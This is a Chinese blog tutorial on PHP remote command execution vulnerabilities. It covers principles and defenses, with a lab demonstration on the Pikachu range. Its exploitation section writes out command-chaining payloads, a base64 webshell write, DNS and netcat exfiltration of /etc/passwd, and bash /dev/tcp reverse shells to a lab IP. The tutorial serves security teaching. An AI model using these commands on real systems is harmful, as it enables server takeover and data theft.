远程命令执行漏洞

最新推荐文章于 2024-05-04 13:53:34 发布
最新推荐文章于 2024-05-04 13:53:34 发布
阅读量1.1k 收藏 24
点赞数 25
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74378387/article/details/136817313
版权

1、介绍

命令执行漏洞是指服务器端没有对客户端用户输入的命令进行充分过滤,导致用户可以通过任意拼接系统命令,使服务器端成功执行任意系统命令。这种漏洞通常发生在服务器端需要调用执行命令的函数时,如PHP中的system、exec、shell_exec等函数。当攻击者能够控制这些函数中的参数时,他们就可以将恶意系统命令拼接到正常命令中,从而实现对服务器的非法控制。

相关函数

在php中可以调用外部程序的常见函数;

system(args)有回显

passthru(args)有回显

exec(args)回显最后一行-必须echo输出

shell_exec(args)无回显-必须输出

反引号:``

popen(handle.mode)无回显

proc_open('cmd','flag','flag')无回显

Sprocess=proc_open('dir'.$des,$pipes);

echo stream_get_contents($pipes[1]);

2、原理

命令执行漏洞的原理主要源于服务端对执行命令的函数缺乏必要的过滤机制。攻击者可以利用这一漏洞,通过编写特定的系统函数,输入到疑似存在命令执行接口的地方,从而检测并利用该漏洞。一旦攻击成功,攻击者就可以执行任意系统命令,包括读取敏感文件、执行恶意代码、甚至获取服务器的完全控制权。

3、危害

命令执行漏洞的危害性极大,因为它允许攻击者绕过正常的安全机制,直接对服务器进行非法操作。此外,由于PHP执行命令通常继承WebServer用户的权限,这意味着攻击者可以利用此漏洞获取到相当高的权限,进一步加剧了漏洞的危害性。

4、防御

开发人员应在编写代码时对可执行的特殊函数入口进行过滤,避免客户端能够提交恶意构造语句并执行。同时,Web服务器也应加强对system、eval和exec等重要函数的过滤,防止命令注入攻击的发生。此外,定期更新和修补服务器软件,以及采用其他安全措施,如使用防火墙和入侵检测系统,也是预防命令执行漏洞的有效手段。

5、测试---pikachu靶场

代码分析:

ipaddress参数是外部可以控制的,在判断类型,使用shell_exec函数调用系统命令,所以存在命令执行漏洞

5.1、命令执行漏洞攻击

;(分号)

命令按照顺序(从左到右)执行,并可用分号来进行分隔。一条命令执行失败,不会影响其他命令

命令执行漏洞可以直接使用&&或者|和管道命令执行其他命令

命令链接符号解析

|(管道符)

通过管道符可以将一个命令的标准输出管理为另一个命令的标准输入。

&(后台任务符)

命令按照顺序(从左到右)执行,跟分号作用一样;此符号作用是后台任务符号是shell在后台执行,这样用户就可以立即得到一个提示符并继续其他工作

&&(逻辑与)

前后的命令执行存在逻辑与关系,只有【&&】前面的命令执行成功后,它后面命令才执行

 ||(逻辑或)

前后命令的执行存在逻辑或关系,只有【||】前面的命令执行失败后,后面的命令才执行

`(反引号)

当一个命令被解析是,它首先会执行反引号之间的操作。例如执行echo `ls-a`

$(command)命令替换

这是命令替换的不同符号。当反引号被过滤或编码是,可能有效

windows命令链接符

| & || && 和liunx一样

有回显的

发现命令执行漏洞,如果是回显的情况喜爱,获取系统敏感信息

win操作系统

type c:\\windows\win.ini

liunx操作系统

cat /etc/passwd

无回显

需要各种利用外通信技巧

命令执行漏洞外通信技巧

利用管道符号写入shell

如果存在漏洞的页面有web服务器,有权限写入,利用shell命令写入webshell后面到网站目录

|echo "PD9waHAgcGhwaW5mbygpOz8+"|base64 -d>2.php

dnslog

dnslog是一个显示解析记录的平台,在无回显的情况下,通过访问dnslog,dnslog会将访问的子域名头部文件记录下来

127.0.0.1|ping -c 2 `whoami`.9h6ydf.dnslog.cn

netcat

如果目标系统存在netcat。使用命令读取文件传递到远程服务器上

远程服务器监听命令

nc -lp 6666>123.txt

本地执行命令

| nc 192.168.10.129 6666< /etc/passwd

命令执行漏洞nc反弹shell

在执行命令漏洞,一般的利用方式是执行反弹shell,再进行其他的操作。执行反弹shell的命令有许多

反弹shell是因为从受害者反向连接到远程服务器,请求是从内部到外部,所以防火墙是不会拦截

远程服务器nc监听命令

nc -vlnp 5555

受害者反弹shell命令,每种语言都有sock连接命令,可以根据不同的换机,选择合适命令

 bash -i >& /dev/tcp/192.168.10.129/5555 0>&1

使用bash shell执行

||/bin/bash -c 'bash -i >& /dev/tcp/192.168.10.129/4444 0>&1'

以乐助勤
关注
  • 25
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
远程命令执行漏洞总结
2201_75857869的博客
02-09 387
fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。fastjson.jar是阿里开发的一款专门用于Java开发的包,可以方便的实现json对象与JavaBean对象的转换,实现JavaBean对象与json字符串的转换,实现json对象与json字符串的转换。除了这个fastjson以外,还有Google开发的Gson包,其他形式的如net.sf.json包,都可以实现json的转换。方法名称不同而已,最后的实现结果都是一样的。
命令执行漏洞——远程命令执行
weixin_54055099的博客
09-17 3846
命令执行漏洞远程命令执行的基础操作
网络安全-RCE(远程命令执行漏洞原理、攻击与防御_rce漏洞原理(1)
最新发布
2401_84265972的博客
05-04 897
RCE(remote command/code execute,远程命令执行)漏洞,一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。
Fastjson远程命令执行漏洞总结
weixin_42345596的博客
08-05 3476
一.FastJson 简介 fastjson.jar包原始下载地址:https://github.com/alibaba/fastjson fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。fastjson.jar是阿里开发的一款专门用于Java开发的包,可以方便的实现json对象与JavaBean对象的转换,实现JavaBean对象与json字符串的转换,实现json对象与json字符串的转换。除了这个fastjson以外,还有Google开
远程命令/代码执行漏洞
Ethan024的博客
04-06 1391
远程命令执行漏洞(RCE, Remote Command/Code Execute) 可以让攻击者直接向后台服务器远程注入操作系统命令或代码,从而控制后台系统。 远程系统命令执行的原因: (1)应用系统从设计上需要给用户提供指定的源码命令操作接口,比如,路由器,防火墙,入侵检测等设备的web管理界面; (2)一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 如果设计者在完成该功能后,没有做严格的安全控制,则可能会导致
远程代码执行漏洞及防御
2301_76717406的博客
03-25 1363
远程命令/代码执行漏洞(RC(command/code)E):RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统;
远程 命令/代码 执行(remote command/code execute)漏洞总结
未完成的歌~的博客
08-20 8162
这周来学习下命令执行漏洞命令执行漏洞是用户通过浏览器在远程服务器上执行任意系统命令,与代码执行漏洞没有太大的区别,不过我们在学习时还是要区分不同的概念。关于代码执行漏洞会在下篇博客中详述。 一、什么是命令执行漏洞: 应用有时需要调用一些执行系统命令的函数,如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等,当用户能控制这些函数中的参数时...
远程命令执行漏洞总结(Unix和Windows)
南迪叶先森
07-15 5126
一 前言 远程代码执行(RCE)使攻击者能够通过注入攻击执行恶意代码。代码注入攻击与命令注入攻击不同。攻击者的成果取决于服务器端的限制,在某些情况下,攻击者可能能够从代码注入升级为命令注入。远程代码攻击可能会完全破坏易受攻击的Web应用程序以及Web服务器。需要注意的是,几乎每种编程语言都有代码执行函数 二 Unix RCE 1 Top 46 RCE 参数 exec={payload} payload={payload} command={payload} run={paylo
dir-859远程命令执行漏洞
Yale的博客
05-26 634
将本次给出的文件同样的办法解压,提取后得到bin文件,将其放入firmayne根目录 输入下图的命令提取文件系统,-b后面指定的内容可以随意,-nk后面是bin文件的名称 然后获取架构信息并保存在数据库中,注意上图的tag为4,大家在操作时要注意自己机器上上条命令的结果 制作镜像文件生成文件系统 自动生成配置,仿真网卡信息 运行固件 打开浏览器(可能需要稍等一会儿) 至此说明环境模拟成功 。 接下来切换到win上,使用ghidra进行分析 注意ghidra需要的是jdk11,下载后默认安装即可
网络安全-渗透测试-RCE远程代码执行漏洞(1)-命令执行、代码执行
weixin_52796034的博客
10-26 2989
RCE(Remote Code Execution)远程代码执行漏洞(有时也叫命令执行漏洞)是一种安全漏洞,攻击者可以利用它来执行远程代码,从而控制受影响的系统。这种漏洞通常出现在应用程序或软件中,攻击者可以通过输入恶意构造的指令或数据,使得应用程序或软件在执行执行攻击者指定的代码。RCE的范围比较广,只要渗透的最终结果可以实现执行命令或者代码都属于RCE,例如代码执行、文件包含、反序列化、命令执行,甚至是写文件Getshell都可以属于RCE,通常情况下RCE漏洞都可以归为高危漏洞
远程命令执行漏洞远程代码执行漏洞33333
zkq001002的博客
10-05 9098
远程命令执行漏洞的原理 远程命令执行漏洞,用户通过浏览器提交执行命令,由于服务器端 没有针对执行函数做 过滤,导致在没有指定绝对路径的情况下就执行命令 复现示例 Tomcat任意文件上传漏洞CVE-2017-12615 介绍 ApacheTomcat服务组件中开启了http的Put方法所造成的攻击者可以利用该方法任意 上传jsp木马所造成的远程代码执行漏洞。 知默认情况下是禁止http请求...
远程代码执行漏洞
weixin_42610010的博客
01-02 592
远程代码执行漏洞是指在计算机系统上,攻击者可以通过网络连接远程执行指定的代码,甚至可以执行操作系统命令。这种漏洞通常存在于应用程序或服务器软件中,攻击者可以利用这种漏洞获取控制权并拥有对系统的完全访问权限。远程代码执行漏洞非常危险,可以造成严重的损害,包括数据泄露、恶意软件的传播、甚至系统完全失控。应该采取有效的措施来防范远程代码执行漏洞,包括使用最新的安全补丁、防火墙和其他安全措施。 ...
远程代码/命令执行漏洞学习(一)
love_wgll的博客
02-23 606
远程代码/命令执行漏洞
RCE-远程命令执行和代码执行漏洞-知识
weixin_44257023的博客
08-04 384
RCE-远程命令执行和代码执行漏洞-知识
网络安全漏洞分析之远程代码执行
2301_77899321的博客
10-10 324
网络安全指的是保护计算机网络及其相关设备、系统和数据不受未经授权访问、破坏、篡改或泄露的一系列措施和技术。网络安全的目标是确保计算机网络的保密性、完整性和可用性,以及防止未经授权的访问和恶意行为。
远程命令执行与反序列化之——远程命令执行漏洞远程代码执行简介
温柔小薛的博客
04-12 747
远程命令执行漏洞简介 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 而如果设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接...
(CVE-2019-0708)Windows远程桌面代码执行漏洞
bring_coco的博客
03-01 977
一.漏洞介绍 2019年5月15日,阿里云云盾应急响应中心监测到微软官方发布紧急安全补丁,修复了一个Windows远程桌面服务的远程代码执行漏洞(CVE-2019-0708),利用此漏洞可以直接获取Windows服务器权限。 该漏洞影响了某些旧版本的Windows系统,该漏洞为预身份验证,无需用户交互,当未经身份验证的攻击者使用RDP(常见端口3389)连接到目标系统并发送特质请求时,可以在目标系统上执行任意命令,甚至传播恶意蠕虫,感染内网其他机器,获取敏感信息,执行远程代码,发起DOS攻击等,类似于201
远程命令执行漏洞原理,以及防护绕过方式
Scalzdp的专栏
11-21 1427
今天分享了远程执行指令的原理和如何进行远程执行指令漏洞的利用和绕过方法,远程命令执行漏洞危害性特别大,攻击者可以利用远程命令执行漏洞给运营团队带来如下一些危害:继承Web服务程序的权限去执行系统命令或读写文件、反弹shell、控制整个网站甚至服务器、进一步内网渗透。在防御的过程我们可以通过加强对用户输入的验证:比如限制输入内容,其次,采用最小权限原则,将程序运行权限限制在最低限度。
smartbi 远程命令执行漏洞
02-02
SmartBI是一种企业级的商业智能系统软件,用于数据分析和报告生成。近期,SmartBI被发现存在远程命令执行漏洞。 该漏洞的存在使得攻击者可以通过构造恶意的命令,并通过远程访问的方式执行这些命令,从而获取系统权限并进行未授权操作。这可能导致许多安全风险,包括未经授权的数据访问、敏感信息泄漏、系统瘫痪等。 远程命令执行漏洞通常是由于软件代码中的缺陷或不安全配置导致的。在SmartBI的情况下,攻击者可以通过用户输入参数中的特殊字符来注入恶意命令,由于软件没有对这些输入进行充分的验证和过滤,导致了漏洞的存在。 为了防止此类漏洞的利用,SmartBI的开发者应该加强对用户输入的验证与过滤。验证用户输入的合法性,确保输入中不包含任何潜在的恶意命令,如特殊字符、命令标识符等。此外,软件应该限制命令执行的权限,只允许执行必要的操作,并保证执行环境的安全性。 对于用户来说,应该及时更新SmartBI软件到最新版本,以获取安全补丁和修复。此外,用户在使用SmartBI时应保持警惕,避免点击不明链接、下载可疑附件,以及及时报告任何异常情况。 总之,SmartBI远程命令执行漏洞的存在给企业数据安全带来了潜在威胁。开发者需要加强软件的安全性设计和防护措施,而用户则应该保持警惕并采取合适的安全措施来最大程度地降低风险。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值